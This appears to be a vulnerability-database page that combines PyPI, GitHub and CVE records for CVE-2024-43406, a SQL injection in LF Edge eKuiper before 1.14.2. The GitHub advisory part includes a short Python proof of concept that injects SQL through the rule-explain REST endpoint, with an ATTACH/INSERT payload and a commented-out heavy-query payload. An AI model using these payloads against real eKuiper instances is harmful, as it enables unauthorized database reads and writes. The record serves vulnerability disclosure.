pysec-2024-72
Vulnerability from pysec
Published
2024-08-20 15:15
Modified
2024-08-28 07:33
Severity
Details
LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constraint edge devices. A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. This vulnerability is fixed in 1.14.2.
Aliases
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "ekuiper",
"purl": "pkg:pypi/ekuiper"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1a9c745649438feaac357d282959687012b65503"
}
],
"repo": "https://github.com/lf-edge/ekuiper",
"type": "GIT"
},
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.2"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.0.1.post10035392509",
"0.0.1.post10469657945",
"0.0.1.post1529761077",
"0.0.1.post1640190752",
"0.0.1.post1656951467",
"0.0.1.post1661454534",
"0.0.1.post1707338123",
"0.0.1.post1926549727",
"0.0.1.post2080668443",
"0.0.1.post2238139389",
"0.0.1.post2474892687",
"0.0.1.post2757722354",
"0.0.1.post2910672767",
"0.0.1.post2911616762",
"0.0.1.post3144438011",
"0.0.1.post3239329472",
"0.0.1.post3334144675",
"0.0.1.post3334852441",
"0.0.1.post3410331757",
"0.0.1.post3411321026",
"0.0.1.post3495668732",
"0.0.1.post3545948676",
"0.0.1.post3712037225",
"0.0.1.post3764011091",
"0.0.1.post3936265927",
"0.0.1.post3954842791",
"0.0.1.post4180521993",
"0.0.1.post4435707843",
"0.0.1.post4562358382",
"0.0.1.post4720014312",
"0.0.1.post5010322351",
"0.0.1.post5065833905",
"0.0.1.post5265725915",
"0.0.1.post5484225879",
"0.0.1.post5899657036",
"0.0.1.post6045113904",
"0.0.1.post6144238120",
"0.0.1.post6453363172",
"0.0.1.post6555916078",
"0.0.1.post6820182077",
"0.0.1.post7205401650",
"0.0.1.post7257106983",
"0.0.1.post7404344961",
"0.0.1.post7405252226",
"0.0.1.post7458781898",
"0.0.1.post7797037221",
"0.0.1.post7983964087",
"0.0.1.post8014428509",
"0.0.1.post8150341330",
"0.0.1.post8273699428",
"0.0.1.post8319707068",
"0.0.1.post8478752636",
"0.0.1.post8782256682",
"0.0.1.post8813247801",
"0.0.1.post8829897389",
"0.0.1.post9220188115",
"0.0.1.post9638601298",
"0.0.1.post9690215560",
"0.0.1.post9736400841",
"1.10.0",
"1.10.1",
"1.10.2",
"1.11.0",
"1.11.1",
"1.11.2",
"1.11.3",
"1.11.4",
"1.11.5",
"1.12.0",
"1.12.1",
"1.12.2",
"1.12.3",
"1.12.4",
"1.12.5",
"1.12.6",
"1.12.7",
"1.12.8",
"1.13.0",
"1.13.1",
"1.13.2",
"1.13.3",
"1.13.4",
"1.13.5",
"1.13.6",
"1.14.0",
"1.14.1",
"1.4.0",
"1.4.1",
"1.4.2",
"1.4.3",
"1.4.4",
"1.5.0",
"1.5.1",
"1.6.0",
"1.6.1",
"1.6.2",
"1.6.3",
"1.7.0",
"1.7.1",
"1.7.2",
"1.7.3",
"1.7.4",
"1.7.5",
"1.7.6",
"1.8.0",
"1.8.1",
"1.8.2",
"1.9.0",
"1.9.1",
"1.9.2",
"0.0.1.post10592133245"
]
}
],
"aliases": [
"CVE-2024-43406",
"GHSA-r5ph-4jxm-6j9p"
],
"details": "LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constraint edge devices. A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. This vulnerability is fixed in 1.14.2.",
"id": "PYSEC-2024-72",
"modified": "2024-08-28T07:33:12.120637Z",
"published": "2024-08-20T15:15:00Z",
"references": [
{
"type": "EVIDENCE",
"url": "https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p"
},
{
"type": "ADVISORY",
"url": "https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p"
},
{
"type": "FIX",
"url": "https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
ghsa-r5ph-4jxm-6j9p
Vulnerability from github
Published
2024-08-20 20:04
Modified
2024-08-27 14:27
Severity
8.8 (High) - CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.7 (High) - CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
8.7 (High) - CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Summary
LF Edge eKuiper has a SQL Injection in sqlKvStore
Details
Summary
A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore.
Details
I will use explainRuleHandler ("/rules/{name}/explain") as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc.
The SQL injection can happen in the code: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93 The code to accept user input is: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277
The rule id in the above code can be used to exploit SQL query.
Note that the delete function is also vulnerable: https://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141
PoC
``` import requests from urllib.parse import quote
SELECT val FROM 'xxx' WHERE key='%s';
payload = f"""'; ATTACH DATABASE 'test93' AS test93; CREATE TABLE test93.pwn (dataz text); INSERT INTO test93.pwn (dataz) VALUES ("sql injection");--"""
payload = "deadbeef'; SELECT 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(100000000))));--"
url = f"http://127.0.0.1:9081/rules/{quote(payload,safe='')}/explain" # explainRuleHandler
res = requests.get(url) print(res.content) ```
The screenshot shows the malicious SQL query to insert a value:
The screenshot shows the breakpoint of executing the query:
Impact
SQL Injection vulnerability
The reporters are Yuan Luo, Shuai Xiong, Haoyu Wang from Tencent YunDing Security Lab.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/lf-edge/ekuiper"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "ekuiper"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.14.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-43406"
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-20T20:04:31Z",
"nvd_published_at": "2024-08-20T15:15:24Z",
"severity": "HIGH"
},
"details": "### Summary\nA user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. \n\n### Details\nI will use explainRuleHandler (\"/rules/{name}/explain\") as an example to illustrate. However, this vulnerability also exists in other methods such as sourceManageHandler, asyncTaskCancelHandler, pluginHandler, etc.\n\nThe SQL injection can happen in the code:\nhttps://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L89-L93\nThe code to accept user input is:\nhttps://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/server/rest.go#L274-L277\n\nThe rule id in the above code can be used to exploit SQL query.\n\nNote that the delete function is also vulnerable:\nhttps://github.com/lf-edge/ekuiper/blob/d6457d008e129b1cdd54d76b5993992c349d1b80/internal/pkg/store/sql/sqlKv.go#L138-L141\n\n### PoC\n```\nimport requests\nfrom urllib.parse import quote\n\n# SELECT val FROM \u0027xxx\u0027 WHERE key=\u0027%s\u0027;\npayload = f\"\"\"\u0027; ATTACH DATABASE \u0027test93\u0027 AS test93;\nCREATE TABLE test93.pwn (dataz text);\nINSERT INTO test93.pwn (dataz) VALUES (\"sql injection\");--\"\"\"\n\n#payload = \"deadbeef\u0027; SELECT 123=LIKE(\u0027ABCDEFG\u0027,UPPER(HEX(RANDOMBLOB(100000000))));--\"\n\nurl = f\"http://127.0.0.1:9081/rules/{quote(payload,safe=\u0027\u0027)}/explain\" # explainRuleHandler\n\nres = requests.get(url)\nprint(res.content)\n```\n\nThe screenshot shows the malicious SQL query to insert a value:\n\n\nThe screenshot shows the breakpoint of executing the query:\n\n\n\n\n\n### Impact\nSQL Injection vulnerability\n\nThe reporters are Yuan Luo, Shuai Xiong, Haoyu Wang from Tencent YunDing Security Lab.\n",
"id": "GHSA-r5ph-4jxm-6j9p",
"modified": "2024-08-27T14:27:18Z",
"published": "2024-08-20T20:04:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43406"
},
{
"type": "WEB",
"url": "https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503"
},
{
"type": "PACKAGE",
"url": "https://github.com/lf-edge/ekuiper"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/ekuiper/PYSEC-2024-72.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "LF Edge eKuiper has a SQL Injection in sqlKvStore"
}
cve-2024-43406
Vulnerability from cvelistv5
Published
2024-08-20 15:00
Modified
2024-08-20 17:42
Severity
Summary
LF Edge eKuiper has a SQL Injection in sqlKvStore
References
| URL | Tags |
|---|---|
| https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p | x_refsource_CONFIRM |
| https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:lfedge:ekuiper:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "ekuiper",
"vendor": "lfedge",
"versions": [
{
"lessThan": "1.14.2",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43406",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-20T17:39:48.544533Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-20T17:42:14.854Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "ekuiper",
"vendor": "lf-edge",
"versions": [
{
"status": "affected",
"version": "\u003c 1.14.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constraint edge devices. A user could utilize and exploit SQL Injection to allow the execution of malicious SQL query via Get method in sqlKvStore. This vulnerability is fixed in 1.14.2."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-20T15:00:06.571Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/lf-edge/ekuiper/security/advisories/GHSA-r5ph-4jxm-6j9p"
},
{
"name": "https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/lf-edge/ekuiper/commit/1a9c745649438feaac357d282959687012b65503"
}
],
"source": {
"advisory": "GHSA-r5ph-4jxm-6j9p",
"discovery": "UNKNOWN"
},
"title": "LF Edge eKuiper has a SQL Injection in sqlKvStore"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-43406",
"datePublished": "2024-08-20T15:00:06.571Z",
"dateReserved": "2024-08-12T18:02:04.966Z",
"dateUpdated": "2024-08-20T17:42:14.854Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
Loading...